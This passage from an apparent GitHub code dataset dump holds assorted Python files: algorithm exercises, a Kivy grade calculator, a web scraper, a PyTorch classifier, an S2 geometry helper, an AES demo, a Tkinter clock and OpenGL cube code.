경우 -2\n # ex) 돼지코 모양: 큰 원 안에 작은 원 2개가 있고,\n # 출발점과 도착점이 각각 작은 원 안에 있는 경우,\n # 큰 원의 개수 * 2 만큼 빼주기\n if (x1 - cx) ** 2 + (y1 - cy) ** 2 <= r ** 2 and (x2 - cx) ** 2 + (y2 - cy) ** 2 <= r ** 2:\n cnt -= 2\n return cnt\n\nfor tc in range(1, TC+1):\n # 출발점과 도착점\n x1, y1, x2, y2 = map(int, input().split())\n n = int(input()) # 원의 개수\n cnt = 0\n\n for i in range(n):\n # 원의 모양\n cx, cy, r = map(int, input().split())\n func(cx, cy, r)\n print(cnt)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"YooKyungHun/Algorithm","sub_path":"ALGORITHM/Python/1004어린왕자.py","file_name":"1004어린왕자.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72777234681","text":"from kivy.app import App\nfrom kivy.core.window import Window\nfrom kivy.lang import Builder\n# from kivy.uix.boxlayout import BoxLayout\n# from kivy.uix.button import Button\n\n\nclass GradeCalculator(App):\n\n def build(self):\n Window.size = (500, 500)\n self.title = \"Grade Calculator\"\n self.root = Builder.load_file('grade_calculator.kv')\n return self.root\n\n def handle_grade_score(self):\n score = self.root.ids.text_input.text\n try:\n score = int(score)\n grade = self.calculate_grade(score)\n self.root.ids.output_display.text = grade\n except ValueError:\n self.root.ids.output_display.text = 'Enter an integer'\n\n def calculate_grade(self, score):\n if score >= 85:\n grade = 'High Distinction'\n elif score >= 75:\n grade = 'Distinction'\n elif score >= 65:\n grade = 'Credit'\n elif score >= 50:\n grade = 'Pass'\n else:\n grade = 'Fail'\n return grade\n\n\n# Create instance of GradeCalculator and run() it\nGradeCalculator().run()\n","repo_name":"Davvott/CP1404","sub_path":"prac_07/Grade_calculator.py","file_name":"Grade_calculator.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43499996239","text":"# bs4\n# https://www.readnovel.com/rank/hotsales?pageNum=1\nimport requests\nfrom bs4 import BeautifulSoup\n\nx_url = 
'https://www.readnovel.com/rank/hotsales?'\n\nparmas ={\n 'pageNum' : 1\n}\n\n\nheader = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'\n\n}\nresponse = requests.get(x_url,headers=header,params=parmas)\nprint(response.status_code)\n# with open('page.html','w') as file:\n# file.write(response.text)\nif response.status_code == 200:\n soup = BeautifulSoup(response.text)\n print(soup.prettify())","repo_name":"XUANXUANXU/6-web-crawler","sub_path":"07-day/xiaoshuowang.py","file_name":"xiaoshuowang.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9964081033","text":"import RPi.GPIO as gpio\ngpio.setmode(gpio.BOARD)\ngpio.setwarnings(0)\ndta=[3,5,7,8]\nfor i in range (0,4):\n gpio.setup(dta[i],gpio.IN)\nwhile(1):\n a=gpio.input(3)\n b=gpio.input(5)<<1\n c=gpio.input(7)<<2\n d=gpio.input(8)<<3\n x=a+b+c+d\n if(x==1):\n print('1')\n if(x==2):\n print('2')\n if(x==3):\n print('3')\n if(x==4):\n print('4')\n if(x==5):\n print('5')\n if(x==6):\n print('6')\n if(x==7):\n print('7')\n if(x==8):\n print('8')\n if(x==9):\n print('9')\n if(x==11):\n print('*')\n if(x==10):\n print('0')\n if(x==12):\n print('#')\n \n","repo_name":"adityahimanshusharma/Codes","sub_path":"Python/Hardware/DTMF_pi.py","file_name":"DTMF_pi.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21286387960","text":"soma_idade = maior = menor = mulheres_menores = 0\nnome_mais_velho = ''\nopcao = ''\nwhile opcao != 'N':\n for p in range(1, 5):\n print(f'¬¬¬¬¬¬ {p}ª pessoa ¬¬¬¬¬¬¬')\n nome = str(input('Nome? ')).strip()\n idade = int(input('Idade? '))\n sexo = str(input('Sexo? [M/F] ')).strip()\n soma_idade += idade\n if sexo in 'fF' and idade < 20:\n mulheres_menores += 1\n if p == 1 and sexo in 'Mm':\n maior = idade\n menor = idade\n else:\n if idade > maior and sexo in 'Mm':\n maior = idade\n nome_mais_velho = nome\n if idade < menor:\n menor = idade\n opcao = str(input('Deseja continuar? 
[S/N] ')).upper()\nprint(f'A média de idade do grupo é de {soma_idade / 4}')\nprint(f'No total são {mulheres_menores} mulheres com menos de 20 anos')\nprint(f'O mais velho tem {maior} anos e seu nome é {nome_mais_velho}')\n","repo_name":"fewatts/Exerc-cios_py_SQl_C","sub_path":"Python/pythonProjectrevisaoPy/Ex56(analisador completo).py","file_name":"Ex56(analisador completo).py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13376663448","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('following//', FollowingList.as_view(), name='following-list'),\n path('followers//', FollowersList.as_view(), name='follower-list'),\n path('follow//', FollowDetail.as_view(), name='follow-detail'),\n path('requests_received//', RequestListReceived.as_view(), name='request-list'),\n path('requests_sent//', RequestListSent.as_view(), name='request-list'),\n path('request//', RequestDetail.as_view(), name='request-detail'),\n path('friends//', FriendList.as_view(), name='request-detail'),\n path(\"follow/\", FollowPost.as_view(), name=\"follow-post\"),\n \n]","repo_name":"CMPUT404W23-OG/CMPUT404-project-socialdistribution","sub_path":"backend/follow/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73003120441","text":"from typing import *\n\nimport torch\nimport torch.nn as nn\nfrom fairseq.modules import TransformerSentenceEncoder\nfrom torch import Tensor\nfrom torch.nn.utils.rnn import PackedSequence, pack_padded_sequence, pad_packed_sequence\n\nfrom fidameval.utils import DEVICE, Config, unpad_sequence\n\n\nclass ModelConfig(Config):\n encoder: str\n vocab_size: int\n nhid: int\n emb_dim: int\n is_binary: bool = True\n pad_idx: Optional[int] = None\n mask_idx: Optional[int] = None\n one_hot_embedding: bool = True\n num_layers: int = 1\n num_heads: int = 1\n learned_pos_embedding: bool = True\n non_linear_decoder: bool = False\n\n\nclass LanguageClassifier(nn.Module):\n def __init__(self, config: ModelConfig):\n super().__init__()\n\n self.vocab_size = config.vocab_size\n self.is_binary = config.is_binary\n self.pad_idx = config.pad_idx\n self.mask_idx = config.mask_idx\n self.one_hot_embedding = config.one_hot_embedding\n self.num_layers = config.num_layers\n self.num_heads = config.num_heads\n self.non_linear_decoder = config.non_linear_decoder\n\n if config.encoder == \"lstm\":\n self.emb_dim = config.emb_dim\n self.positional_embeddings = None\n self.nhid = config.nhid\n\n self.embeddings = nn.Embedding(self.vocab_size, self.emb_dim)\n self.encoder = nn.LSTM(\n self.emb_dim, self.nhid, self.num_layers, batch_first=True\n )\n elif config.encoder == \"transformer\":\n self.emb_dim = config.emb_dim * config.num_heads\n self.nhid = self.emb_dim\n\n self.embeddings = nn.Embedding(self.vocab_size, self.emb_dim)\n self.encoder = TransformerSentenceEncoder(\n padding_idx=self.pad_idx,\n vocab_size=self.vocab_size,\n num_encoder_layers=config.num_layers,\n embedding_dim=self.emb_dim,\n ffn_embedding_dim=config.nhid,\n num_attention_heads=config.num_heads,\n dropout=0.0,\n attention_dropout=0.0,\n activation_dropout=0.0,\n learned_pos_embedding=config.learned_pos_embedding,\n )\n self.positional_embeddings = self.encoder.embed_positions # copy?\n self.encoder.embed_positions = None\n else:\n raise ValueError(\"Encoder type must be 'lstm' or 
'transformer'\")\n\n if config.non_linear_decoder:\n # Based on BERT imp of fairseq\n non_linear_decoder = nn.Sequential(\n nn.Linear(self.nhid, self.nhid),\n nn.ReLU(),\n nn.LayerNorm(self.nhid),\n )\n self.lm_decoder = nn.Sequential(\n non_linear_decoder, nn.Linear(self.nhid, config.vocab_size)\n )\n self.binary_decoder = nn.Sequential(\n non_linear_decoder, nn.Linear(self.nhid, 1)\n )\n else:\n self.lm_decoder = nn.Linear(self.nhid, config.vocab_size)\n self.binary_decoder = nn.Linear(self.nhid, 1)\n\n self.init_weights()\n self.to(DEVICE)\n\n def init_weights(self):\n initrange = 0.1\n if self.one_hot_embedding:\n max_emb_size = max(self.vocab_size, self.emb_dim)\n self.embeddings.weight.data = torch.eye(max_emb_size)[\n : self.vocab_size, : self.emb_dim\n ]\n self.embeddings.weight.requires_grad = False\n else:\n self.embeddings.weight.data.uniform_(-initrange, initrange)\n\n lm_decoder = self.lm_decoder[-1] if self.non_linear_decoder else self.lm_decoder\n binary_decoder = (\n self.binary_decoder[-1] if self.non_linear_decoder else self.binary_decoder\n )\n\n lm_decoder.bias.data.fill_(1 / self.vocab_size)\n lm_decoder.weight.data.uniform_(-initrange, initrange)\n binary_decoder.weight.data.uniform_(-initrange, initrange)\n\n if self.pad_idx is not None:\n self.embeddings.weight.data[self.pad_idx] = 0.0\n\n def create_inputs_embeds(\n self, input_ids: Tensor, add_positional: bool = True\n ) -> Tensor:\n if input_ids.ndim == 1:\n input_ids = input_ids.unsqueeze(0)\n\n if (self.positional_embeddings is not None) and add_positional:\n return self.embeddings(input_ids) + self.positional_embeddings(input_ids)\n else:\n return self.embeddings(input_ids)\n\n def forward(\n self,\n input_ids: Optional[Tensor] = None,\n inputs_embeds: Optional[Tensor] = None,\n input_lengths: Optional[Tensor] = None,\n mask_ids: Optional[List[List[int]]] = None,\n return_attention=False,\n return_hidden=False,\n return_hidden_only=False,\n pseudo_ll=False,\n ):\n if inputs_embeds is None and input_ids is None:\n raise ValueError(\"inputs_embeds or input_ids must be provided\")\n if input_ids is not None and input_ids.ndim == 1:\n input_ids = input_ids.unsqueeze(0)\n if inputs_embeds is None:\n inputs_embeds = self.create_inputs_embeds(input_ids.to(DEVICE))\n if inputs_embeds.ndim == 2:\n inputs_embeds = inputs_embeds.unsqueeze(0)\n\n inputs_embeds = inputs_embeds.to(DEVICE)\n\n if isinstance(self.encoder, nn.LSTM):\n if input_lengths is not None:\n inputs_embeds = pack_padded_sequence(\n inputs_embeds, input_lengths, batch_first=True, enforce_sorted=False\n )\n\n hidden, _ = self.encoder(inputs_embeds)\n\n if isinstance(hidden, PackedSequence):\n hidden, _ = pad_packed_sequence(hidden, batch_first=True)\n elif pseudo_ll:\n assert input_ids is not None\n assert self.mask_idx is not None\n hidden = torch.zeros_like(inputs_embeds, device=DEVICE)\n\n for idx in range(inputs_embeds.shape[1]):\n masked_input = input_ids.clone()\n masked_input[:, idx] = self.mask_idx\n masked_embeds = self.create_inputs_embeds(masked_input.to(DEVICE))\n output = self.encoder(\n masked_input,\n token_embeddings=masked_embeds,\n last_state_only=True,\n attn_mask=None,\n )\n hidden[:, idx] = output[0][0].transpose(0, 1)[:, idx]\n else:\n attn_mask = None\n token_proxy = (\n torch.zeros(inputs_embeds.shape[:-1])\n if input_ids is None\n else input_ids\n )\n output = self.encoder(\n token_proxy,\n token_embeddings=inputs_embeds,\n last_state_only=True,\n attn_mask=attn_mask,\n )\n hidden = output[0][0].transpose(0, 1) # T x B x D -> B x 
T x D\n\n if mask_ids is not None:\n hidden = torch.cat(\n [hidden[idx, mask_idx] for idx, mask_idx in enumerate(mask_ids)]\n )\n\n if return_hidden_only:\n return hidden\n\n if self.is_binary:\n if isinstance(self.encoder, TransformerSentenceEncoder):\n final_hidden = hidden[:, 0, :]\n elif input_lengths is None:\n final_hidden = hidden[:, -1, :]\n else:\n batch_size = hidden.shape[0]\n final_hidden = hidden[range(batch_size), input_lengths - 1]\n\n predictions = self.binary_decoder(final_hidden)\n else:\n predictions = self.lm_decoder(hidden)\n\n if mask_ids is None and input_lengths is not None:\n predictions = unpad_sequence(predictions, lengths=input_lengths)\n\n predictions = predictions.squeeze(1)\n\n if return_attention:\n print(\"Attention maps currently not supported!\")\n\n if return_hidden:\n return predictions, hidden\n\n return predictions\n\n @property\n def num_parameters(self):\n return sum(torch.prod(torch.tensor(x.shape)) for x in self.parameters())\n","repo_name":"jumelet/fidam-eval","sub_path":"fidameval/train/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8185,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"18353373358","text":"import shapely\nfrom shapely.wkt import loads\nimport s2sphere as s2\nimport geopandas as gpd\n\n\nclass S2Service:\n \"\"\"\n S2 service for utilizing the S2 functionalities\n \"\"\"\n\n @staticmethod\n def get_bounding_box_cell_ids(latitudes, longitudes, resolution_level):\n min_level = resolution_level\n max_level = resolution_level\n r = s2.RegionCoverer()\n r.min_level = min_level\n r.max_level = max_level\n\n lb_lat = min(latitudes)\n ub_lat = max(latitudes)\n lb_lon = min(longitudes)\n ub_lon = max(longitudes)\n\n lb = s2.LatLng.from_degrees(lb_lat, lb_lon)\n ub = s2.LatLng.from_degrees(ub_lat, ub_lon)\n cell_ids = r.get_covering(s2.LatLngRect.from_point_pair(lb, ub))\n return cell_ids\n\n @staticmethod\n def wkt_to_cell_ids(field_wkt, resolution_level, point=False):\n \"\"\"\n fetches cell ids from S2 for the provided wkt field\n \"\"\"\n try:\n poly = loads(field_wkt)\n if point:\n longs, lats = poly.coords.xy\n else:\n longs, lats = poly.exterior.coords.xy\n longs, lats = longs.tolist(), lats.tolist()\n cell_ids = S2Service.get_bounding_box_cell_ids(lats, longs, resolution_level)\n return cell_ids\n except Exception as e:\n raise Exception(e)\n\n\n @staticmethod\n def wkt_to_cell_tokens(field_wkt, resolution_level, point=False):\n \"\"\"\n fetches cell tokens from S2 for the provided wkt field\n \"\"\"\n try:\n s2_cell_ids = S2Service.wkt_to_cell_ids(field_wkt, resolution_level, point=point)\n s2_token_list = []\n for s2_cell_id in s2_cell_ids:\n s2_token_list.append(s2_cell_id.to_token())\n\n return s2_token_list\n except Exception as e:\n raise Exception(e)\n\n @staticmethod\n def get_boundary_coverage(s2_cell_ids, polygon, max_resolution_col_name):\n \"\"\"\n returns lats and longs of the specific s2 cell ids\n \"\"\"\n s2_index__l19_list = []\n p_gdf = gpd.GeoDataFrame()\n idx = 0\n for s2_cell_id in s2_cell_ids:\n s2_cell = s2.Cell(s2_cell_id)\n vertices = []\n for i in range(0, 4):\n vertex = s2_cell.get_vertex(i)\n latlng = s2.LatLng.from_point(vertex)\n vertices.append((latlng.lng().degrees, latlng.lat().degrees))\n geo = shapely.geometry.Polygon(vertices)\n if polygon.intersects(geo):\n s2_index__l19_list.append(s2_cell_id.to_token())\n p_gdf.loc[idx, max_resolution_col_name] = s2_cell_id.to_token()\n p_gdf.loc[idx, 'geometry'] = geo\n idx += 
1\n\n p_gdf.reset_index(drop=True, inplace=True)\n return p_gdf\n\n @staticmethod\n def get_cell_token_for_lat_long(lat, long):\n \"\"\"\n Get the S2 cell tokens for the given lat and long\n Fetching Resolution level 13 and 20 tokens\n :param lat:\n :param long:\n :return:\n \"\"\"\n s2_cell_token_13 = s2.Cell.from_lat_lng(s2.LatLng.from_degrees(lat, long)).id().parent(13).to_token()\n s2_cell_token_20 = s2.Cell.from_lat_lng(s2.LatLng.from_degrees(lat, long)).id().parent(20).to_token()\n return s2_cell_token_13, s2_cell_token_20\n\n @staticmethod\n def get_cell_tokens_for_bounding_box(latitudes, longitudes, resolution_level=13):\n \"\"\"\n Fetch the S2 cell tokens for the given Bounding Box\n :param resolution_level:\n :param latitudes:\n :param longitudes:\n :return:\n \"\"\"\n s2_cell_ids = S2Service.get_bounding_box_cell_ids(latitudes, longitudes, resolution_level)\n s2_token_list = []\n for s2_cell_id in s2_cell_ids:\n s2_token_list.append(s2_cell_id.to_token())\n return s2_token_list\n","repo_name":"agstack/asset-registry","sub_path":"s2_service.py","file_name":"s2_service.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"30253185542","text":"from xml.dom import minidom\n\n\ndef main():\n # parse untuk load file xml -> memory\n # dan lakukan parsing\n doc = minidom.parse(\"file.xml\")\n\n # cetak isi doc dg tag pertamanya\n print(doc.nodeName)\n print(doc.firstChild.tagName)\n\n nama = doc.getElementsByTagName(\"nama\")[0].firstChild.data\n alamat = doc.getElementsByTagName(\"alamat\")[0].firstChild.data\n jurusan = doc.getElementsByTagName(\"jurusan\")[0].firstChild.data\n list_hobi = doc.getElementsByTagName(\"hobi\")\n\n print(\"Nama: {}\\nAlamat: {}\\nJurusan: {}\\n\".format(nama, alamat, jurusan))\n\n # bikin element\n hobi_baru = doc.createElement(\"hobi\")\n hobi_baru.setAttribute(\"name\", \"programming\")\n doc.firstChild.appendChild(hobi_baru)\n # load again\n list_hobi = doc.getElementsByTagName(\"hobi\")\n\n print(\"Memiliki {} hobi:\".format(len(list_hobi)))\n\n for hobi in list_hobi:\n print(\"-\", hobi.getAttribute(\"name\"))\n\n # simpan permanen ke dalam file.xml\n file_xml = open(\"file.xml\",\"w\")\n doc.writexml(file_xml)\n file_xml.close()\n\nmain()","repo_name":"SemmiDev/Python-Basic","sub_path":"petanikode/files/XMLParsingWithDOMAPI/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23506046838","text":"from setuptools import setup, find_packages\nfrom setuptools.command.build_py import build_py\nfrom codecs import open\nfrom os import makedirs, path\nfrom shutil import copyfile\n\nhere = path.abspath(path.dirname(__file__))\nname = \"jolt\"\nexec(open(\"jolt/version.py\").read())\n\n\n# Get the long description from the README file\nwith open(path.join(here, \"README.rst\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\ntry:\n with open(path.join(here, \"requirements.txt\"), encoding=\"utf-8\") as f:\n pinned_reqs = f.readlines()\nexcept FileNotFoundError:\n pinned_reqs = []\n\n\nclass BuildCommand(build_py):\n def run(self):\n build_py.run(self)\n\n # Install additional files required by selfdeploy plugin\n if not self.dry_run:\n target_dir = path.join(self.build_lib, name, \"plugins\", \"selfdeploy\")\n makedirs(target_dir, exist_ok=True)\n for fn in [\"setup.py\", \"README.rst\"]:\n copyfile(path.join(here, fn), 
path.join(target_dir,fn))\n\nsetup(\n name=name,\n cmdclass={\"build_py\": BuildCommand},\n version=__version__,\n python_requires=\">=3.8\",\n description=\"A task executor\",\n long_description=long_description,\n url=\"https://github.com/srand/jolt\",\n author=\"Robert Andersson\",\n author_email=\"srand@github.com\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"Topic :: Software Development :: Build Tools\",\n \"Topic :: Software Development :: Testing\",\n \"License :: OSI Approved :: GNU General Public License v2 (GPLv2)\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX\",\n \"Programming Language :: C\",\n \"Programming Language :: C++\",\n \"Programming Language :: Java\",\n \"Programming Language :: JavaScript\",\n \"Programming Language :: Python :: 3\",\n ],\n keywords=[\n \"bazel\",\n \"build\",\n \"cmake\",\n \"conan\",\n \"jolt\",\n \"make\",\n \"meson\",\n \"msbuild\",\n \"xcode\",\n ],\n packages=find_packages(exclude=[\"contrib\", \"docs\", \"tests\"]),\n install_requires=pinned_reqs or [\n \"bz2file\",\n \"click>=8.1\",\n \"colorama\",\n \"fasteners\",\n \"jinja2\",\n \"keyring\",\n \"keyrings.alt\",\n \"lxml\",\n \"multi_key_dict\",\n \"ninja-syntax\",\n \"psutil\",\n \"pygit2\",\n \"requests\",\n \"tqdm\",\n ],\n dependency_links=[],\n extras_require={\n \"allure\": [\"allure-python-commons\"],\n \"amqp\": [\"pika\"],\n \"conan\": [\"conan<2.0\"],\n \"dev\": [\"check-manifest\"],\n \"doc\": [\"sphinx-click\", \"sphinx-rtd-theme\"],\n \"test\": [\"coverage\"],\n },\n package_data={\n \"jolt\": [\"**/*.sh\", \"**/*.xslt\", \"**/*.template\"],\n },\n entry_points={\n \"console_scripts\": [\n \"jolt=jolt.__main__:main\",\n ],\n },\n)\n","repo_name":"srand/jolt","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"7657720849","text":"# 10814번 나이순 정렬\r\nN = int(input())\r\n\r\nli = [tuple(input().split()) for _ in range(N)]\r\nli = [(int(age), name) for age, name in li]\r\n\r\nli.sort(key=lambda x : x[0])\r\n\r\nfor x, y in li:\r\n print(x,y)","repo_name":"hmnd1257/BOJ","sub_path":"백준/Silver/10814. 
나이순 정렬/나이순 정렬.py","file_name":"나이순 정렬.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73851717879","text":"import sys\r\nimport math\r\ndef extendedEuclidean(a, b):\r\n x0, x1, y0, y1 = 1, 0, 0, 1\r\n while b != 0:\r\n n, a, b = a // b, b, a % b\r\n x0, x1 = x1, x0 - n * x1\r\n y0, y1 = y1, y0 - n * y1\r\n return x0, y0\r\n\r\nn = int(sys.stdin.readline())\r\nfor i in range(n):\r\n a, b = map(int, sys.stdin.readline().split())\r\n if b == 1:\r\n if a + 1 > 10 ** 9:\r\n print(\"IMPOSSIBLE\")\r\n else:\r\n print(a + 1)\r\n continue\r\n if a == 1:\r\n print(1)\r\n continue\r\n x0, y0 = extendedEuclidean(a, b)\r\n if a * x0 + b * y0 == 1 and y0 <= 10 ** 9:\r\n if y0 >= 0:\r\n print(y0)\r\n else:\r\n print(a + y0)\r\n else:\r\n print(\"IMPOSSIBLE\")","repo_name":"H3LLO-kr/BAEKJOON","sub_path":"Python/BOJ_3955.py","file_name":"BOJ_3955.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38931945838","text":"from Crypto.Cipher import AES\r\nfrom Crypto.Random import get_random_bytes\r\n\r\ndef pad(text):\r\n \"\"\"Thêm byte để đảm bảo độ dài của văn bản là bội số của 16\"\"\"\r\n return text + b\"\\0\" * (AES.block_size - len(text) % AES.block_size)\r\n\r\ndef encrypt(key, plaintext):\r\n \"\"\"Mã hóa văn bản bằng AES với khóa đã cho\"\"\"\r\n plaintext = pad(plaintext)\r\n iv = get_random_bytes(AES.block_size) # Tạo một vectơ khởi đầu ngẫu nhiên\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n ciphertext = cipher.encrypt(plaintext)\r\n return iv + ciphertext\r\n\r\ndef decrypt(key, ciphertext):\r\n \"\"\"Giải mã văn bản bằng AES với khóa đã cho\"\"\"\r\n iv = ciphertext[:AES.block_size] # Lấy vectơ khởi đầu từ đầu mã hóa\r\n ciphertext = ciphertext[AES.block_size:] # Lấy phần còn lại của mã hóa\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n plaintext = cipher.decrypt(ciphertext)\r\n return plaintext.rstrip(b\"\\0\")\r\n\r\n# Sử dụng ví dụ mã hóa và giải mã\r\nif __name__ == \"__main__\":\r\n key = b\"ledinhthuc123456\" # Đây là một khóa AES hợp lệ có độ dài 16 byte (128 bit)\r\n plaintext = b\"Hello, World!\" # Văn bản cần được mã hóa\r\n print(type(plaintext))\r\n\r\n # Mã hóa văn bản\r\n ciphertext = encrypt(key, plaintext)\r\n print(\"Ciphertext:\", ciphertext)\r\n\r\n # Giải mã văn bản\r\n decrypted_text = decrypt(key, ciphertext)\r\n print(\"Decrypted text:\", decrypted_text)\r\n","repo_name":"Jackson2706/BTL_LTMM","sub_path":"AES/AES.py","file_name":"AES.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35010671119","text":"\"\"\"Task\nYou are given a string. 
Split the string on a \" \" (space) delimiter and join using a - hyphen.\n\nFunction Description\n\nComplete the split_and_join function in the editor below.\n\nsplit_and_join has the following parameters:\n\nstring line: a string of space-separated words\nReturns\n\nstring: the resulting string\nInput Format\nThe one line contains a string consisting of space separated words.\n\nSample Input\n\nthis is a string \nSample Output\n\nthis-is-a-string \"\"\"\n\n\ndef split_and_join(line):\n \n newlist = line.split()\n joinnedList = \"\"\n\n for i in range(0,len(newlist)):\n if i != len(newlist)-1:\n newlist[i] = newlist[i] + \"-\"\n print(i)\n print(\"item \" + newlist[i])\n joinnedList = joinnedList + newlist[i] \n print(\"joinnedList\" , joinnedList )\n\n return joinnedList\n \n\nline = input()\nresult = split_and_join(line)\nprint(result)\n \n\n","repo_name":"Arunpmohanan/python","sub_path":"python/basics/Stringsplit.py","file_name":"Stringsplit.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9251378985","text":"try:\n\timport Tkinter\nexcept:\n\timport tkinter as Tkinter\n\nimport math\t# Required For Coordinates Calculation\nimport time\t# Required For Time Handling\n#\n#\n# class\nclass main(Tkinter.Tk):\n\tdef __init__(self):\n\t\tTkinter.Tk.__init__(self)\n\t\tself.x=150\t# Center Point x\n\t\tself.y=150\t# Center Point\n\t\tself.length=50\t# Stick Length\n\t\tself.creating_all_function_trigger()\n\n\t# Creating Trigger For Other Functions\n\tdef creating_all_function_trigger(self):\n\t\tself.create_canvas_for_shapes()\n\t\tself.creating_background_()\n\t\tself.creating_sticks()\n\t\treturn\n\n\t# Creating Background\n\tdef creating_background_(self):\n\t\tself.image=Tkinter.PhotoImage(file='clock.gif')\n\t\tself.canvas.create_image(150,150, image=self.image)\n\t\treturn\n\n\t# creating Canvas\n\tdef create_canvas_for_shapes(self):\n\t\tself.canvas=Tkinter.Canvas(self, bg='black')\n\t\tself.canvas.pack(expand='yes',fill='both')\n\t\treturn\n\n\t# Creating Moving Sticks\n\tdef creating_sticks(self):\n\t\tself.sticks=[]\n\t\tfor i in range(3):\n\t\t\tstore=self.canvas.create_line(self.x, self.y,self.x+self.length,self.y+self.length,width=2, fill='red')\n\t\t\tself.sticks.append(store)\n\t\treturn\n\n\t# Function Need Regular Update\n\tdef update_class(self):\n\t\tnow=time.localtime()\n\t\tt = time.strptime(str(now.tm_hour), \"%H\")\n\t\thour = int(time.strftime( \"%I\", t ))*5\n\t\tnow=(hour,now.tm_min,now.tm_sec)\n\t\t# Changing Stick Coordinates\n\t\tfor n,i in enumerate(now):\n\t\t\tx,y=self.canvas.coords(self.sticks[n])[0:2]\n\t\t\tcr=[x,y]\n\t\t\tcr.append(self.length*math.cos(math.radians(i*6)-math.radians(90))+self.x)\n\t\t\tcr.append(self.length*math.sin(math.radians(i*6)-math.radians(90))+self.y)\n\t\t\tself.canvas.coords(self.sticks[n], tuple(cr))\n\t\treturn\n\n# Main Function Trigger\nif __name__ == '__main__':\n\troot=main()\n\n\t# Creating Main Loop\n\twhile True:\n\t\troot.update()\n\t\troot.update_idletasks()\n\t\troot.update_class()\n","repo_name":"dixitt5/CP-Solutions","sub_path":"Python programs/analogClock.py","file_name":"analogClock.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"40"} +{"seq_id":"15918880237","text":"\"\"\" cube\nOriginal PyCube written by Michael King\n\nBased and modified from original version found 
at:\nhttp://stackoverflow.com/questions/30745703/rotating-a-cube-using-quaternions-in-pyopengl\n\"\"\"\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\n\nimport math\nimport numpy as np\nfrom enum import Enum\nfrom queue import Queue\n\nfrom enums import FaceRotation\nfrom geometry import Geometry\nfrom helpers import LittleHelpers\nfrom mathf import Mathf\nfrom quat import *\nfrom tween import *\n\nclass State(Enum):\n    IDLE = 0\n    TWEENING = 1\n\nclass Cube:\n    def __init__(self, settings, face_rotation_ease_type, sticker_texture_id, size=3):\n        default_color = (0, 0, 0)\n        self.padding = settings.cube_padding\n        self.draw_cubies = settings.cube_draw_cubies\n        self.draw_sphere = settings.cube_draw_sphere\n        self.draw_lines = settings.cube_draw_lines\n        self.line_width = settings.cube_line_width\n        self.inner_color = LittleHelpers.convert_hex_color_to_floats(settings.cube_inner_color, default_color)\n        self.sphere_color = LittleHelpers.convert_hex_color_to_floats(settings.cube_sphere_color, default_color)\n        self.angular_drag = settings.cube_angular_drag\n        self.scale_drag = settings.cube_scale_drag\n        self.min_scale = settings.cube_min_scale/size\n        self.max_scale = settings.cube_max_scale\n\n        self.size = size\n\n        self.rot_x = 0\n        self.rot_y = 0\n        self.accum = (1, 0, 0, 0)\n\n        self.scale = 1/(self.size/3)\n        self.scale_speed = 0\n        self.sphere_radius = 3\n        self.sphere_slices = 16\n        self.sphere_stacks = 16\n\n        self.face_rotation_tween_time = settings.cube_face_rotation_tween_time\n        self.face_rotation_ease_type = face_rotation_ease_type\n        self.texture_mapping_enabled = settings.texture_mapping_enabled\n        self.sticker_texture_id = sticker_texture_id\n\n        self.geometry = Geometry(self.size)\n        self.face_colors = (\n            (0, 154/255, 74/255),  # Front: Green\n            (1, 86/255, 35/255),  # Left: Orange\n            (0, 75/255, 171/255),  # Back: Blue\n            (190/255, 15/255, 56/255),  # Right: Red\n            (1, 1, 1),  # Up: White\n            (1, 210/255, 44/255),  # Down: Yellow\n        )\n        self.reset()\n\n        rx 